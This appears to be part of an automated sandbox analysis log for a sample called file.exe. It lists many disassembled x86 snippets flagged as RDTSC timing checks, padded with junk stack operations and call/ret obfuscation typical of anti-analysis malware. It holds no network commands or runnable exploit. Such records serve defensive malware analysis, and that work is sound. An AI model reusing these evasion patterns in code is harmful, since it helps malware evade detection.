Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A695C5 second address: A6965A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jne 00007F4DA4C5B32Ch 0x00000014 pop eax 0x00000015 jmp 00007F4DA4C5B329h 0x0000001a jmp 00007F4DA4C5B324h 0x0000001f lea ebx, dword ptr [ebp+1245E1A0h] 0x00000025 mov dword ptr [ebp+122D2C2Ah], eax 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e je 00007F4DA4C5B32Dh 0x00000034 jmp 00007F4DA4C5B327h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69744 second address: A6974A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C8B4 second address: A5C8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4DA4C5B31Eh 0x0000000a jnc 00007F4DA4C5B331h 0x00000010 push ebx 0x00000011 jmp 00007F4DA4C5B323h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8725C second address: A87268 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4DA4C5D846h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87268 second address: A87282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B322h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87710 second address: A87720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4DA4C5D846h 0x0000000a jnl 00007F4DA4C5D846h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A879C9 second address: A879E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A879E8 second address: A879F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F4DA4C5D846h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A879F5 second address: A879FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A879FA second address: A87A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4DA4C5D851h 0x0000000b popad 0x0000000c jp 00007F4DA4C5D850h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87A29 second address: A87A33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87A33 second address: A87A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87A39 second address: A87A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87D32 second address: A87D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4DA4C5D857h 0x0000000b jnl 00007F4DA4C5D846h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A87D55 second address: A87D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7CE67 second address: A7CE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7CE75 second address: A7CE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A886DB second address: A886E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A886E3 second address: A8870D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4DA4C5B316h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007F4DA4C5B325h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8870D second address: A88712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A88712 second address: A88717 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8911D second address: A89129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89129 second address: A89135 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89135 second address: A89139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5FE70 second address: A5FE76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90823 second address: A90827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A90827 second address: A90840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F4DA4C5B31Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8F739 second address: A8F76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5D856h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4DA4C5D854h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8F76B second address: A8F778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A8F778 second address: A8F780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95C36 second address: A95C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95811 second address: A9581D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4DA4C5D846h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9581D second address: A95822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95974 second address: A95978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95978 second address: A959A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4DA4C5B31Ah 0x0000000f jmp 00007F4DA4C5B326h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A95ADA second address: A95ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96EBB second address: A96EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96EC0 second address: A96ECA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4DA4C5D84Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96ECA second address: A96EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007F4DA4C5B316h 0x00000010 jl 00007F4DA4C5B316h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96F85 second address: A96F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96F8B second address: A96F8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A96F8F second address: A96FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a js 00007F4DA4C5D84Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97090 second address: A97094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97094 second address: A97098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9713F second address: A97145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97241 second address: A9724C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4DA4C5D846h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A979F9 second address: A97A29 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007F4DA4C5B316h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, C520h 0x00000013 push 00000000h 0x00000015 sub esi, dword ptr [ebp+1245E730h] 0x0000001b push 00000000h 0x0000001d and edi, dword ptr [ebp+122D33D9h] 0x00000023 mov dword ptr [ebp+122D2420h], eax 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97A29 second address: A97A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97A2D second address: A97A33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97A33 second address: A97A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5D84Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A97A4A second address: A97A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A983A2 second address: A983A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9821B second address: A9821F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A983A8 second address: A983AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9821F second address: A98229 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4DA4C5B316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98229 second address: A9822F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9822F second address: A98256 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F4DA4C5B328h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98256 second address: A98260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4DA4C5D846h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A98260 second address: A98264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9AADC second address: A9AAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B5D4 second address: A9B64D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4DA4C5B31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F4DA4C5B318h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 movzx edi, dx 0x0000002a jo 00007F4DA4C5B322h 0x00000030 jmp 00007F4DA4C5B31Ch 0x00000035 push 00000000h 0x00000037 sbb si, E840h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F4DA4C5B318h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov dword ptr [ebp+1246B9D5h], ebx 0x0000005e xchg eax, ebx 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B64D second address: A9B651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B651 second address: A9B655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CD3A second address: A9CD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0B2A second address: AA0B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0B2E second address: AA0B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA0BED second address: AA0BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3A18 second address: AA3A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA3B47 second address: AA3B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA5914 second address: AA5918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA4ADC second address: AA4AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA4AE2 second address: AA4AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA6A7B second address: AA6A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7BE0 second address: AA7BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7BE4 second address: AA7BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA6D00 second address: AA6D20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4DA4C5D84Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4DA4C5D84Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7E2A second address: AA7E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9E59 second address: AA9E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9E5D second address: AA9E6B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4DA4C5B316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9E6B second address: AA9EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F4DA4C5D84Fh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F4DA4C5D848h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+122D2C9Bh], edi 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2198h], edi 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b jne 00007F4DA4C5D850h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9EC6 second address: AA9ED8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F4DA4C5B31Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA8E67 second address: AA8E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA8F14 second address: AA8F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAAF54 second address: AAAF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA9FFC second address: AAA00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DA4C5B31Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA8F18 second address: AA8F2F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jl 00007F4DA4C5D848h 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AABF70 second address: AABFEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F4DA4C5B318h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F4DA4C5B318h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 push ecx 0x00000041 jnl 00007F4DA4C5B31Ch 0x00000047 pop edi 0x00000048 push 00000000h 0x0000004a movsx ebx, di 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jp 00007F4DA4C5B318h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AABFEE second address: AABFF3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAB0A0 second address: AAB13E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DA4C5B31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4DA4C5B323h 0x0000000f nop 0x00000010 cmc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 and bh, 00000000h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov dword ptr [ebp+122D19FDh], edx 0x00000028 call 00007F4DA4C5B31Eh 0x0000002d pushad 0x0000002e or dword ptr [ebp+122D19E2h], eax 0x00000034 xor ecx, dword ptr [ebp+122D18E3h] 0x0000003a popad 0x0000003b pop edi 0x0000003c mov eax, dword ptr [ebp+122D0BA1h] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F4DA4C5B318h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c mov dword ptr [ebp+122D257Fh], edi 0x00000062 push FFFFFFFFh 0x00000064 mov dword ptr [ebp+122D2415h], eax 0x0000006a stc 0x0000006b nop 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 je 00007F4DA4C5B316h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAB13E second address: AAB148 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4DA4C5D846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
